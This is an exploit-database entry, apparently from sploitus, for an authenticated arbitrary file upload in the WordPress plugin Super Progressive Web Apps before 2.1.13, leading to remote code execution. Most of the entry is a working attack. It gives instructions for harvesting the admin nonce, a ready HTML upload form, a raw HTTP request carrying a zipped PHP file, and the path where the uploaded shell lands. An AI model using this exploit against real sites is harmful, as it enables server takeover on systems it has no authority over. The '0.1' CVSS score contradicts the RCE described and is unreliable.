Exploit for Super Progressive Web Apps < 2.1.13 - Authenticated (High Privileged) Arbitrary File Upload to RCE

Name: Exploit for Super Progressive Web Apps < 2.1.13 - Authenticated (High Privileged) Arbitrary File Upload to RCE
Rating: 5 (100 reviews)

2021-06-29 | CVSS 0.1

## https://sploitus.com/exploit?id=WPEX-ID:FD1F0CEE-44E7-4847-A53D-E54844399FD1
Login to the blog as an admin, grab the nonce via the source of /wp-admin/admin.php?page=superpwa-apple-icons (the Apple touch icons & splash screen needs to be active), ie "var superpwaIosScreen = {"nonce":"XXXXXXXX"};"

Save the code below in an HTML file (replace the example.com by the correct domain), then open it in the same browser used to log on to the blog, add the nonce grabbed earlier and select an archive of a PHP file

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
    Zipped PHP File
    <input type="file" name="file"/><br/><br/>
    Nonce (Login as admin and get it from the source of /wp-admin/admin.php?page=superpwa-apple-icons: "var superpwaIosScreen = {"nonce":"XXXXXXXX"};")<br/>
    <input type="text" name="security_nonce"><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34156245217942151802178343738
Content-Length: 724
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------34156245217942151802178343738
Content-Disposition: form-data; name="action"

superpwa_splashscreen_uploader
-----------------------------34156245217942151802178343738
Content-Disposition: form-data; name="file"; filename="134.zip"
Content-Type: application/zip

PK���IE������������ �134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�õ�����³±/È(PHMÎÈWPwsôôquQ·V°·ã�PK^Ý}u������PK���IE^Ý}u������� ���������ÿ����134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�õ�����PK������\���v�����
-----------------------------34156245217942151802178343738
Content-Disposition: form-data; name="security_nonce"

f702fd7016
-----------------------------34156245217942151802178343738--


PHP will be at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php